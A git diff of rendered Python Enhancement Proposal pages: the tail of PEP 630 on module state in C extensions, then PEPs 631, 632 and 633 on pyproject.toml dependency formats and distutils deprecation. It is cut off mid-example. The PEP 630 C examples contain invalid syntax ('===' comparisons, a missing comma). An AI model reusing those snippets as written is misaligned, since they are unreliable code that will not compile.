The largest roadblock is getting the class a method was defined in, or +that method’s “defining class” for short. The defining class can have a +reference to the module it is part of.

+

Do not confuse the defining class with Py_TYPE(self). If the method +is called on a subclass of your type, Py_TYPE(self) will refer to +that subclass, which may be defined in different module than yours.

+
+

Note

+

The following Python code can illustrate the concept. +Base.get_defining_class returns Base even +if type(self) == Sub:

+
class Base:
+    def get_defining_class(self):
+        return __class__
+
+class Sub(Base):
+    pass
+
+
+
+

For a method to get its “defining class”, it must use the +METH_METHOD | METH_FASTCALL | METH_KEYWORDS calling convention +and the corresponding PyCMethod signature:

+
PyObject *PyCMethod(
+    PyObject *self,               // object the method was called on
+    PyTypeObject *defining_class, // defining class
+    PyObject *const *args,        // C array of arguments
+    Py_ssize_t nargs,             // length of "args"
+    PyObject *kwnames)            // NULL, or dict of keyword arguments
+
+
+

Once you have the defining class, call PyType_GetModuleState to get +the state of its associated module.

+

For example:

+
static PyObject *
+example_method(PyObject *self,
+        PyTypeObject *defining_class,
+        PyObject *const *args,
+        Py_ssize_t nargs,
+        PyObject *kwnames)
+{
+    my_struct *state = (my_struct*)PyType_GetModuleState(defining_class);
+    if (state === NULL) {
+        return NULL;
+    }
+    ... // rest of logic
+}
+
+PyDoc_STRVAR(example_method_doc, "...");
+
+static PyMethodDef my_methods[] = {
+    {"example_method",
+      (PyCFunction)(void(*)(void))example_method,
+      METH_METHOD|METH_FASTCALL|METH_KEYWORDS,
+      example_method_doc}
+    {NULL},
+}
+
+
+
+
+

Module State Access from Slot Methods, Getters and Setters

+
+

Note

+

This is new in Python 3.11.

+
+

Slot methods – the fast C equivalents for special methods, such as nb_add +for __add__ or tp_new +for initialization – have a very simple API that doesn’t allow +passing in the defining class, unlike with PyCMethod. +The same goes for getters and setters defined with +PyGetSetDef.

+

To access the module state in these cases, use the PyType_GetModuleByDef +function, and pass in the module definition. +Once you have the module, call PyModule_GetState +to get the state:

+
PyObject *module = PyType_GetModuleByDef(Py_TYPE(self), &module_def);
+my_struct *state = (my_struct*)PyModule_GetState(module);
+if (state === NULL) {
+    return NULL;
+}
+
+
+

PyType_GetModuleByDef works by searching the MRO +(i.e. all superclasses) for the first superclass that has a corresponding +module.

+
+

Note

+

In very exotic cases (inheritance chains spanning multiple modules +created from the same definition), PyType_GetModuleByDef might not +return the module of the true defining class. However, it will always +return a module with the same definition, ensuring a compatible +C memory layout.

+
+
+
+

Lifetime of the Module State

+

When a module object is garbage-collected, its module state is freed. +For each pointer to (a part of) the module state, you must hold a reference +to the module object.

+

Usually this is not an issue, because types created with +PyType_FromModuleAndSpec, and their instances, hold a reference +to the module. +However, you must be careful in reference counting when you reference +module state from other places, such as callbacks for external +libraries.

+
+
+
+

Open Issues

+

Several issues around per-module state and heap types are still open.

+

Discussions about improving the situation are best held on the capi-sig +mailing list.

+
+

Type Checking

+

Currently (as of Python 3.10), heap types have no good API to write +Py*_Check functions (like PyUnicode_Check exists for str, a +static type), and so it is not easy to ensure that instances have a +particular C layout.

+
+
+

Metaclasses

+

Currently (as of Python 3.10), there is no good API to specify the +metaclass of a heap type; that is, the ob_type field of the type +object.

+
+
+

Per-Class Scope

+

It is also not possible to attach state to types. While +PyHeapTypeObject is a variable-size object (PyVarObject), +its variable-size storage is currently consumed by slots. Fixing this +is complicated by the fact that several classes in an inheritance +hierarchy may need to reserve some state.

+
+
+

Lossless Conversion to Heap Types

+

The heap type API was not designed for “lossless” conversion from static types; +that is, creating a type that works exactly like a given static type. +The best way to address it would probably be to write a guide that covers +known “gotchas”.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0630.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0631/index.html b/pep-0631/index.html new file mode 100644 index 00000000000..ddef0a0bbe1 --- /dev/null +++ b/pep-0631/index.html @@ -0,0 +1,361 @@ + + + + + + + + PEP 631 – Dependency specification in pyproject.toml based on PEP 508 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 631 – Dependency specification in pyproject.toml based on PEP 508

+
+
Author:
+
Ofek Lev <ofekmeister at gmail.com>
+
Sponsor:
+
Paul Ganssle <paul at ganssle.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
20-Aug-2020
+
Post-History:
+
20-Aug-2020
+
Superseded-By:
+
621
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP specifies how to write a project’s dependencies in a +pyproject.toml file for packaging-related tools to consume +using the fields defined in PEP 621.

+
+

Note

+

This PEP has been accepted and was merged into PEP 621.

+
+
+
+

Entries

+

All dependency entries MUST be valid PEP 508 strings.

+

Build backends SHOULD abort at load time for any parsing errors.

+
from packaging.requirements import InvalidRequirement, Requirement
+
+...
+
+try:
+    Requirement(entry)
+except InvalidRequirement:
+    # exit
+
+
+
+
+

Specification

+
+

dependencies

+
    +
  • Format: array of strings
  • +
  • Related core metadata: +
  • +
+

Every element MUST be an entry.

+
[project]
+dependencies = [
+  'PyYAML ~= 5.0',
+  'requests[security] < 3',
+  'subprocess32; python_version < "3.2"',
+]
+
+
+
+
+

optional-dependencies

+ +

Each key is the name of the provided option, with each value being the same type as +the dependencies field i.e. an array of strings.

+
[project.optional-dependencies]
+tests = [
+  'coverage>=5.0.3',
+  'pytest',
+  'pytest-benchmark[histogram]>=3.2.1',
+]
+
+
+
+
+
+

Example

+

This is a real-world example port of what docker-compose defines.

+
[project]
+dependencies = [
+  'cached-property >= 1.2.0, < 2',
+  'distro >= 1.5.0, < 2',
+  'docker[ssh] >= 4.2.2, < 5',
+  'dockerpty >= 0.4.1, < 1',
+  'docopt >= 0.6.1, < 1',
+  'jsonschema >= 2.5.1, < 4',
+  'PyYAML >= 3.10, < 6',
+  'python-dotenv >= 0.13.0, < 1',
+  'requests >= 2.20.0, < 3',
+  'texttable >= 0.9.0, < 2',
+  'websocket-client >= 0.32.0, < 1',
+
+  # Conditional
+  'backports.shutil_get_terminal_size == 1.0.0; python_version < "3.3"',
+  'backports.ssl_match_hostname >= 3.5, < 4; python_version < "3.5"',
+  'colorama >= 0.4, < 1; sys_platform == "win32"',
+  'enum34 >= 1.0.4, < 2; python_version < "3.4"',
+  'ipaddress >= 1.0.16, < 2; python_version < "3.3"',
+  'subprocess32 >= 3.5.4, < 4; python_version < "3.2"',
+]
+
+[project.optional-dependencies]
+socks = [ 'PySocks >= 1.5.6, != 1.5.7, < 2' ]
+tests = [
+  'ddt >= 1.2.2, < 2',
+  'pytest < 6',
+  'mock >= 1.0.1, < 4; python_version < "3.4"',
+]
+
+
+
+
+

Implementation

+
+

Parsing

+
from packaging.requirements import InvalidRequirement, Requirement
+
+def parse_dependencies(config):
+    dependencies = config.get('dependencies', [])
+    if not isinstance(dependencies, list):
+        raise TypeError('Field `project.dependencies` must be an array')
+
+    for i, entry in enumerate(dependencies, 1):
+        if not isinstance(entry, str):
+            raise TypeError(f'Dependency #{i} of field `project.dependencies` must be a string')
+
+        try:
+            Requirement(entry)
+        except InvalidRequirement as e:
+            raise ValueError(f'Dependency #{i} of field `project.dependencies` is invalid: {e}')
+
+    return dependencies
+
+def parse_optional_dependencies(config):
+    optional_dependencies = config.get('optional-dependencies', {})
+    if not isinstance(optional_dependencies, dict):
+        raise TypeError('Field `project.optional-dependencies` must be a table')
+
+    optional_dependency_entries = {}
+
+    for option, dependencies in optional_dependencies.items():
+        if not isinstance(dependencies, list):
+            raise TypeError(
+                f'Dependencies for option `{option}` of field '
+                '`project.optional-dependencies` must be an array'
+            )
+
+        entries = []
+
+        for i, entry in enumerate(dependencies, 1):
+            if not isinstance(entry, str):
+                raise TypeError(
+                    f'Dependency #{i} of option `{option}` of field '
+                    '`project.optional-dependencies` must be a string'
+                )
+
+            try:
+                Requirement(entry)
+            except InvalidRequirement as e:
+                raise ValueError(
+                    f'Dependency #{i} of option `{option}` of field '
+                    f'`project.optional-dependencies` is invalid: {e}'
+                )
+            else:
+                entries.append(entry)
+
+        optional_dependency_entries[option] = entries
+
+    return optional_dependency_entries
+
+
+
+
+

Metadata

+
def construct_metadata_file(metadata_object):
+    """
+    https://packaging.python.org/specifications/core-metadata/
+    """
+    metadata_file = 'Metadata-Version: 2.1\n'
+
+    ...
+
+    if metadata_object.dependencies:
+        # Sort dependencies to ensure reproducible builds
+        for dependency in sorted(metadata_object.dependencies):
+            metadata_file += f'Requires-Dist: {dependency}\n'
+
+    if metadata_object.optional_dependencies:
+        # Sort extras and dependencies to ensure reproducible builds
+        for option, dependencies in sorted(metadata_object.optional_dependencies.items()):
+            metadata_file += f'Provides-Extra: {option}\n'
+            for dependency in sorted(dependencies):
+                if ';' in dependency:
+                    metadata_file += f'Requires-Dist: {dependency} and extra == "{option}"\n'
+                else:
+                    metadata_file += f'Requires-Dist: {dependency}; extra == "{option}"\n'
+
+    ...
+
+    return metadata_file
+
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0631.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0632/index.html b/pep-0632/index.html new file mode 100644 index 00000000000..c2c128f721a --- /dev/null +++ b/pep-0632/index.html @@ -0,0 +1,376 @@ + + + + + + + + PEP 632 – Deprecate distutils module | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 632 – Deprecate distutils module

+
+
Author:
+
Steve Dower <steve.dower at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
03-Sep-2020
+
Python-Version:
+
3.10
+
Post-History:
+
03-Sep-2020, 22-Jan-2021
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

The distutils module [1] has for a long time recommended using the +setuptools package [2] instead. Setuptools has recently integrated a +complete copy of distutils and is no longer dependent on the standard +library [3]. Pip has been silently replacing distutils with +setuptools when installing packages for a long time already, and the +distutils documentation has stated that it is being phased out since +2014 (or earlier). It is time to remove it from the standard library.

+
+
+

Motivation

+

distutils [1] is a largely undocumented and unmaintained collection +of utilities for packaging and distributing Python packages, including +compilation of native extension modules. It defines a configuration +format that describes a Python distribution and provides the tools to +convert a directory of source code into a source distribution, and +some forms of binary distribution. Because of its place in the +standard library, many updates can only be released with a major +release, and users cannot rely on particular fixes being available.

+

setuptools [2] is a better documented and well maintained enhancement +based on distutils. While it provides very similar functionality, it +is much better able to support users on earlier Python releases, and +can respond to bug reports more quickly. A number of platform-specific +enhancements already exist in setuptools that have not been added to +distutils, and there is been a long-standing recommendation in the +distutils documentation to prefer setuptools.

+

Historically, setuptools has extended distutils using subclassing and +monkeypatching, but has now taken a copy of the underlying code. [3] +As a result, the second last major dependency on distutils is gone and +there is no need to keep it in the standard library.

+

The final dependency on distutils is CPython itself, which uses it to +build native extension modules in the standard library (except on +Windows). Because this is a CPython build-time dependency, it is +possible to continue to use distutils for this specific case without +it being part of the standard library.

+

Deprecation and removal will make it obvious that issues should be +fixed in the setuptools project, and will reduce a source of bug +reports and unnecessary test maintenance. It will also help promote +the development of alternative build backends, which can now be +supported more easily thanks to PEP 517.

+
+
+

Specification

+

In Python 3.10 and 3.11, distutils will be formally marked as +deprecated. All known issues will be closed at this time. +import distutils will raise a deprecation warning. New issues that +would be considered release blocking may still be fixed, but support +for new tools or platforms will not be added.

+

During Python 3.10 and 3.11, uses of distutils within the standard +library may change to use alternative APIs.

+

In Python 3.12, distutils will no longer be installed by make +install or any of the first-party distribution. Third-party +redistributors should no longer include distutils in their bundles or +repositories.

+

This PEP makes no specification on migrating the parts of the CPython +build process that currently use distutils. Depending on +contributions, this migration may occur at any time.

+

After Python 3.12 is started and when the CPython build process no +longer depends on distutils being in the standard library, the entire +Lib/distutils directory and Lib/test/test_distutils.py file +will be removed from the repository.

+

Other references to distutils will be cleaned up. As of Python 3.9’s +initial release, the following modules have references in code or +comments:

+
    +
  • Lib/ctypes/util.py
  • +
  • Lib/site.py
  • +
  • Lib/sysconfig.py
  • +
  • Lib/_aix_support.py
  • +
  • Lib/_bootsubprocess.py
  • +
  • Lib/_osx_support.py
  • +
  • Modules/_decimal/tests/formathelper.py
  • +
+

The following Tools in CPython also refer to distutils. Note that none +of these are installed with CPython:

+
    +
  • PC/layout (references will be removed)
  • +
  • Tools/msi (references will be removed)
  • +
  • Tools/peg_generator (will be adapted to a different build tool)
  • +
  • Tools/test2to3 (example project will be removed)
  • +
+

As the distutils code is already included in setuptools, there is no +need to republish it in any other form. Those who require access to +the functionality should use setuptools or an alternative build +backend.

+
+
+

Backwards Compatibility

+

Code that imports distutils will no longer work from Python 3.12.

+

The suggested migration path is to use the equivalent (though not +identical) imports from setuptools (see [5]), or to migrate to an +alternative build backend (see PEP 517).

+

Code already exists in setuptools to transparently switch setup.py +files using distutils onto their equivalents, and so most working +build scripts are already known to work with setuptools. Such scripts +may need to update their import statements. Consult the setuptools +documentation for specific migration advice. [5]

+

Some projects use alternate sets of patches over distutils, notably, +numpy.distutils. [6] Projects that we know are doing this have been +informed.

+

Many build scripts use custom commands or narrowly scoped patches. As +these packages are already subject to setuptools overriding distutils, +we expect minimal disruption as a result of distutils being removed. +Scripts may still need to be updated to avoid importing distutils.

+
+
+

Reference Implementation

+

setuptools version 48 includes the complete copy of distutils, and as +such is no longer dependent on the standard library’s copy. Most +implementation issues they have faced are due to the continuing +existence of distutils in the standard library, and so removal will +improve the stability of their implementation.

+

There is not yet a reference implementation for the removal of +distutils from the standard library, nor is there an implementation +for CPython’s native module builds without relying on the standard +library copy of distutils.

+
+
+

Migration Advice

+
+

Note

+

This section suggests some alternative replacements for popular +functionality that is being formally deprecated with this PEP. It +is current at time of writing, but is not kept up to date.

+
+

For these modules or types, setuptools is the best substitute:

+
    +
  • distutils.ccompiler
  • +
  • distutils.cmd.Command
  • +
  • distutils.command
  • +
  • distutils.config
  • +
  • distutils.core.Distribution
  • +
  • distutils.errors
  • +
+

For these modules or types, use the standards-defined Python Packaging +Authority packages specified:

+
    +
  • distutils.version — use the packaging package
  • +
+

For these modules or functions, use the standard library module shown:

+
    +
  • distutils.fancy_getopt — use the argparse module
  • +
  • distutils.spawn.find_executable — use the shutil.which function
  • +
  • distutils.spawn.spawn — use the subprocess.run function
  • +
  • distutils.sysconfig — use the sysconfig module
  • +
  • distutils.util.get_platform — use the platform module
  • +
+

For these functions, and any others not mentioned here, you will need +to reimplement the functionality yourself. The legacy documentation +can be found at https://docs.python.org/3.9/distutils/apiref.html

+
    +
  • distutils.dir_util.create_tree
  • +
  • distutils.util.change_root
  • +
  • distutils.util.strtobool
  • +
+
+
+

Rejected Ideas

+
+

Deprecate but do not delete

+

The primary concern with this approach is that distutils most +frequently breaks because of platform differences, which means that +without maintenance, it will stop working out-of-sync with any +Python release. This makes it impossible for libraries to reliably +detect when they will stop working.

+

In contrast, this PEP proposes a concrete date, known well in advance, +when distutils will stop working, and commits to not breaking the API +before that time. This gives maintainers a predictable schedule, +ensures any breakage occurs at a point where users will already be +expecting changed behavior, and provides a reliable detection +mechanism (specifically, that import distutils raises).

+

Finally, as long as distutils remains in the standard library in any +form, it will interfere with third-party packages that provide shims +or replacements, including setuptools. Completely removing the +package at a known version makes it possible for third-parties to +safely use a substitute.

+
+
+

Only deprecate the setuptools-like functionality

+

This suggestion assumes that there exists a volunteer to maintain +whatever is left, which is not true. It also implies that anybody +knows which functionality should remain, which as seen in the +discussions is not at all clear.

+

Most helper functions in distutils already have supported (and +improved) alternatives, often in the standard library, and there is +little that can be done to the legacy versions without breaking +compatibility. (And any break requiring maintainers to update their +code is essentially equivalent to requiring them to import a different +function.)

+

The last point from the previous section also applies here.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0632.rst

+

Last modified: 2023-10-10 11:05:14 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0633/index.html b/pep-0633/index.html new file mode 100644 index 00000000000..54fabcf769d --- /dev/null +++ b/pep-0633/index.html @@ -0,0 +1,815 @@ + + + + + + + + PEP 633 – Dependency specification in pyproject.toml using an exploded TOML table | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 633 – Dependency specification in pyproject.toml using an exploded TOML table

+
+
Author:
+
Laurie Opperman <laurie_opperman at hotmail.com>, +Arun Babu Neelicattu <arun.neelicattu at gmail.com>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
02-Sep-2020
+
Post-History:
+
02-Sep-2020
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP has been rejected in favour of PEP 631 due to its popularity, +consistency with the existing usage of PEP 508 strings, and compatibility +with existing packaging tool suites.

+
+
+

Abstract

+

This PEP specifies how to write a project’s dependencies in a +pyproject.toml file for packaging-related tools to consume using the fields +defined in PEP 621, as an alternative to the PEP 508-based approach +defined in PEP 631.

+
+
+

Motivation

+

There are multiple benefits to using TOML tables and other data-types to +represent requirements rather than PEP 508 strings:

+
    +
  • Easy initial validation via the TOML syntax.
  • +
  • Easy secondary validation using a schema, for example a JSON Schema.
  • +
  • Potential for users to guess the keys of given features, rather than +memorising a syntax.
  • +
  • Users of multiple other popular languages may already be familiar with the +TOML syntax.
  • +
  • TOML directly represents the same data structures as in JSON, and therefore a +sub-set of Python literals, so users can understand the hierarchy and type of +value
  • +
+
+
+

Rationale

+

Most of this is taken from discussions in the PEP 621 dependencies topic. +This has elements from Pipfile, Poetry, Dart’s dependencies and +Rust’s Cargo. A comparison document shows advantages and disadvantages +between this format and PEP 508-style specifiers.

+

In the specification of multiple requirements with the same distribution name +(where environment markers choose the appropriate dependency), the chosen +solution is similar to Poetry’s, where an array of requirements is allowed.

+

The direct-reference keys closely align with and utilise PEP 610 and +PEP 440 as to reduce differences in the packaging ecosystem and rely on +previous work in specification.

+
+
+

Specification

+

As in PEP 621, if metadata is improperly specified then tools MUST raise an +error. The metadata MUST conform to the TOML specification.

+

To reduce confusion with this document being a specification for specifying +dependencies, the word “requirement” is used to mean a PEP 508 dependency +specification.

+

The following tables are added to the project table specified in +PEP 621.

+
+

dependencies

+

Format: table

+

The keys inside this table are the names of the required distribution. The +values can have one of the following types:

+
    +
  • string: the requirement is defined only by a version requirement, with same +specification as version in the requirement table, except allowing the +empty string "" to place no restriction on the version.
  • +
  • table: a requirement table.
  • +
  • array: an array of requirement tables. It is an error to specify an empty +array [] as a value.
  • +
+
+

Requirement table

+

The keys of the requirement table are as follows (all are optional):

+
    +
  • version (string): a PEP 440 version specifier, which is a +comma-delimited list of version specifier clauses. The string MUST be +non-empty.
  • +
  • extras (array of strings): a list of PEP 508 extras declarations for +the distribution. The list MUST be non-empty.
  • +
  • markers (string): a PEP 508 environment marker expression. The string +MUST be non-empty.
  • +
  • url (string): the URL of the artifact to install and satisfy the +requirement. Note that file:// is the prefix used for packages to be +retrieved from the local filesystem.
  • +
  • git, hg, bzr or svn (string): the URL of a VCS repository +(as specified in PEP 440) +to clone, whose tree will be installed to satisfy the requirement. Further +VCS keys will be added via amendments to PEP 610, however tools MAY opt to +support other VCS’s using their command-line command prior to the acceptance +of the amendment.
  • +
  • revision (string): the identifier for a specific revision of the +specified VCS repository to check-out before installation. Users MUST only +provide this when one of git, hg, bzr, svn, or another VCS +key is used to identify the distribution to install. Revision identifiers are +suggested in PEP 610.
  • +
+

At most one of the following keys can be specified simultaneously, as they +logically conflict with each other in the requirement: version, url, +git, hg, bzr, svn, and any other VCS key.

+

An empty requirement table {} places no restriction on the requirement, in +addition to the empty string "".

+

Any keys provided which are not specified in this document MUST cause an error +in parsing.

+
+
+
+

optional-dependencies

+

Format: table

+

The keys inside this table are the names of an extra’s required distribution. +The values can have one of the following types:

+
    +
  • table: a requirement table.
  • +
  • array: an array of requirement tables.
  • +
+

These requirement tables have +the same specification as above, with the addition of +the following required key:

+
    +
  • for-extra (string): the name of the PEP 508 extra that this +requirement is required for.
  • +
+
+
+
+

Reference implementation

+

Tools will need to convert this format to PEP 508 requirement strings. Below +is an example implementation of that conversion (assuming validation is already +performed):

+
def convert_requirement_to_pep508(name, requirement):
+    if isinstance(requirement, str):
+        requirement = {"version": requirement}
+    pep508 = name
+    if "extras" in requirement:
+        pep508 += " [" + ", ".join(requirement["extras"]) + "]"
+    if "version" in requirement:
+        pep508 += " " + requirement["version"]
+    if "url" in requirement:
+        pep508 += " @ " + requirement["url"]
+    for vcs in ("git", "hg", "bzr", "svn"):
+        if vcs in requirement:
+            pep508 += " @ " + vcs + "+" + requirement[vcs]
+            if "revision" in requirement:
+                pep508 += "@" + requirement["revision"]
+    extra = None
+    if "for-extra" in requirement:
+        extra = requirement["for-extra"]
+    if "markers" in requirement:
+        markers = requirement["markers"]
+        if extra:
+            markers = "extra = '" + extra + "' and (" + markers + ")"
+        pep508 += "; " + markers
+    return pep508, extra
+
+
+def convert_requirements_to_pep508(dependencies):
+    pep508s = []
+    extras = set()
+    for name, req in dependencies.items():
+        if isinstance(req, list):
+            for sub_req in req:
+                pep508, extra = convert_requirement_to_pep508(name, sub_req)
+                pep508s.append(pep508)
+                if extra:
+                    extras.add(extra)
+        else:
+            pep508, extra = convert_requirement_to_pep508(name, req)
+            pep508s.append(pep508)
+            if extra:
+                extras.add(extra)
+    return pep508s, extras
+
+
+def convert_project_requirements_to_pep508(project):
+    reqs, _ = convert_requirements_to_pep508(project.get("dependencies", {}))
+    optional_reqs, extras = convert_requirements_to_pep508(
+        project.get("optional-dependencies", {})
+    )
+    reqs += optional_reqs
+    return reqs, extras
+
+
+
+

JSON schema

+

For initial validation, a JSON-schema can be used. Not only does this help +tools have a consistent validation, but it allows code editors to highlight +validation errors as users are building the dependencies list.

+
{
+    "$id": "spam",
+    "$schema": "http://json-schema.org/draft-07/schema#",
+    "title": "Project metadata",
+    "type": "object",
+    "definitions": {
+        "requirementTable": {
+            "title": "Full project dependency specification",
+            "type": "object",
+            "properties": {
+                "extras": {
+                    "title": "Dependency extras",
+                    "type": "array",
+                    "items": {
+                        "title": "Dependency extra",
+                        "type": "string"
+                    }
+                },
+                "markers": {
+                    "title": "Dependency environment markers",
+                    "type": "string"
+                }
+            },
+            "propertyNames": {
+                "enum": [
+                    "extras",
+                    "markers",
+                    "version",
+                    "url",
+                    "git",
+                    "hg",
+                    "bzr",
+                    "svn",
+                    "for-extra"
+                ]
+            },
+            "oneOf": [
+                {
+                    "title": "Version requirement",
+                    "properties": {
+                        "version": {
+                            "title": "Version",
+                            "type": "string"
+                        }
+                    }
+                },
+                {
+                    "title": "URL requirement",
+                    "properties": {
+                        "url": {
+                            "title": "URL",
+                            "type": "string",
+                            "format": "uri"
+                        }
+                    },
+                    "required": [
+                        "url"
+                    ]
+                },
+                {
+                    "title": "VCS requirement",
+                    "properties": {
+                        "revision": {
+                            "title": "VCS repository revision",
+                            "type": "string"
+                        }
+                    },
+                    "oneOf": [
+                        {
+                            "title": "Git repository",
+                            "properties": {
+                                "git": {
+                                    "title": "Git URL",
+                                    "type": "string",
+                                    "format": "uri"
+                                }
+                            },
+                            "required": [
+                                "git"
+                            ]
+                        },
+                        {
+                            "title": "Mercurial repository",
+                            "properties": {
+                                "hg": {
+                                    "title": "Mercurial URL",
+                                    "type": "string",
+                                    "format": "uri"
+                                }
+                            },
+                            "required": [
+                                "hg"
+                            ]
+                        },
+                        {
+                            "title": "Bazaar repository",
+                            "properties": {
+                                "bzr": {
+                                    "title": "Bazaar URL",
+                                    "type": "string",
+                                    "format": "uri"
+                                }
+                            },
+                            "required": [
+                                "bzr"
+                            ]
+                        },
+                        {
+                            "title": "Subversion repository",
+                            "properties": {
+                                "svn": {
+                                    "title": "Subversion URL",
+                                    "type": "string",
+                                    "format": "uri"
+                                }
+                            },
+                            "required": [
+                                "svn"
+                            ]
+                        }
+                    ]
+                }
+            ]
+        },
+        "requirementVersion": {
+            "title": "Version project dependency specification",
+            "type": "string"
+        },
+        "requirement": {
+            "title": "Project dependency specification",
+            "oneOf": [
+                {
+                    "$ref": "#/definitions/requirementVersion"
+                },
+                {
+                    "$ref": "#/definitions/requirementTable"
+                },
+                {
+                    "title": "Multiple specifications",
+                    "type": "array",
+                    "items": {
+                        "$ref": "#/definitions/requirementTable"
+                    },
+                    "minLength": 1
+                }
+            ]
+        },
+        "optionalRequirementTable": {
+            "title": "Project optional dependency specification table",
+            "allOf": [
+                {
+                    "$ref": "#/definitions/requirementTable"
+                },
+                {
+                    "properties": {
+                        "for-extra": {
+                            "title": "Dependency's extra",
+                            "type": "string"
+                        }
+                    },
+                    "required": [
+                        "for-extra"
+                    ]
+                }
+            ]
+        },
+        "optionalRequirement": {
+            "title": "Project optional dependency specification",
+            "oneOf": [
+                {
+                    "$ref": "#/definitions/optionalRequirementTable"
+                },
+                {
+                    "title": "Multiple specifications",
+                    "type": "array",
+                    "items": {
+                        "$ref": "#/definitions/optionalRequirementTable"
+                    },
+                    "minLength": 1
+                }
+            ]
+        }
+    },
+    "properties": {
+        "dependencies": {
+            "title": "Project dependencies",
+            "type": "object",
+            "additionalProperties": {
+                "$ref": "#/definitions/requirement"
+            }
+        },
+        "optional-dependencies": {
+            "title": "Project dependencies",
+            "type": "object",
+            "additionalProperties": {
+                "$ref": "#/definitions/optionalRequirement"
+            }
+        }
+    }
+}
+
+
+
+
+
+

Examples

+

Full artificial example:

+
[project.dependencies]
+flask = { }
+django = { }
+requests = { version = ">= 2.8.1, == 2.8.*", extras = ["security", "tests"], markers = "python_version < '2.7'" }
+pip = { url = "https://github.com/pypa/pip/archive/1.3.1.zip" }
+sphinx = { git = "ssh://git@github.com/sphinx-doc/sphinx.git" }
+numpy = "~=1.18"
+pytest = [
+    { version = "<6", markers = "python_version < '3.5'" },
+    { version = ">=6", markers = "python_version >= '3.5'" },
+]
+
+[project.optional-dependencies]
+pytest-timout = { for-extra = "dev" }
+pytest-mock = [
+    { version = "<6", markers = "python_version < '3.5'", for-extra = "dev" },
+    { version = ">=6", markers = "python_version >= '3.5'", for-extra = "dev" },
+]
+
+
+

In homage to PEP 631, the following is an equivalent dependencies +specification for docker-compose:

+
[project.dependencies]
+cached-property = ">= 1.2.0, < 2"
+distro = ">= 1.2.0, < 2"
+docker = { extras = ["ssh"], version = ">= 4.2.2, < 5" }
+docopt = ">= 0.6.1, < 1"
+jsonschema = ">= 2.5.1, < 4"
+PyYAML = ">= 3.10, < 6"
+python-dotenv = ">= 0.13.0, < 1"
+requests = ">= 2.20.0, < 3"
+texttable = ">= 0.9.0, < 2"
+websocket-client = ">= 0.32.0, < 1"
+
+# Conditional
+"backports.shutil_get_terminal_size" = { version = "== 1.0.0", markers = "python_version < '3.3'" }
+"backports.ssl_match_hostname" = { version = ">= 3.5, < 4", markers = "python_version < '3.5'" }
+colorama = { version = ">= 0.4, < 1", markers = "sys_platform == 'win32'" }
+enum34 = { version = ">= 1.0.4, < 2", markers = "python_version < '3.4'" }
+ipaddress = { version = ">= 1.0.16, < 2", markers = "python_version < '3.3'" }
+subprocess32 = { version = ">= 3.5.4, < 4", markers = "python_version < '3.2'" }
+
+[project.optional-dependencies]
+PySocks = { version = ">= 1.5.6, != 1.5.7, < 2", for-extra = "socks" }
+ddt = { version = ">= 1.2.2, < 2", for-extra = "tests" }
+pytest = { version = "< 6", for-extra = "tests" }
+mock = { version = ">= 1.0.1, < 4", markers = "python_version < '3.4'", for-extra = "tests" }
+
+
+
+
+

Compatibility Examples

+

The authors of this PEP recognise that various tools need to both read +from and write to this format for dependency specification. This section +aims to provide direct comparison with and examples for translating to/from +the currently used standard, PEP 508.

+
+

Note

+

For simplicity and clarity, various ways in which TOML allows you to specify each +specification is not represented. These examples use the standard inline representation.

+

For example, while following are considered equivalent in TOML, we choose the +second form for the examples in this section.

+
aiohttp.version = "== 3.6.2"
+aiohttp = { version = "== 3.6.2" }
+
+
+
+
+

Version Constrained Dependencies

+

No Version Constraint

+
aiohttp
+
+
+
aiohttp = {}
+
+
+

Simple Version Constraint

+
aiohttp >= 3.6.2, < 4.0.0
+
+
+
aiohttp = { version = ">= 3.6.2, < 4.0.0" }
+
+
+
+

Note

+

This can, for conciseness, be also represented as a string.

+
aiohttp = ">= 3.6.2, < 4.0.0"
+
+
+
+
+
+

Direct Reference Dependencies

+

URL Dependency

+
aiohttp @ https://files.pythonhosted.org/packages/97/d1/1cc7a1f84097d7abdc6c09ee8d2260366f081f8e82da36ebb22a25cdda9f/aiohttp-3.6.2-cp35-cp35m-macosx_10_13_x86_64.whl
+
+
+
aiohttp = { url = "https://files.pythonhosted.org/packages/97/d1/1cc7a1f84097d7abdc6c09ee8d2260366f081f8e82da36ebb22a25cdda9f/aiohttp-3.6.2-cp35-cp35m-macosx_10_13_x86_64.whl" }
+
+
+

VCS Dependency

+
aiohttp @ git+ssh://git@github.com/aio-libs/aiohttp.git@master
+
+
+
aiohttp = { git = "ssh://git@github.com/aio-libs/aiohttp.git", revision = "master" }
+
+
+
+
+

Environment Markers

+
aiohttp >= 3.6.1; python_version >= '3.8'
+
+
+
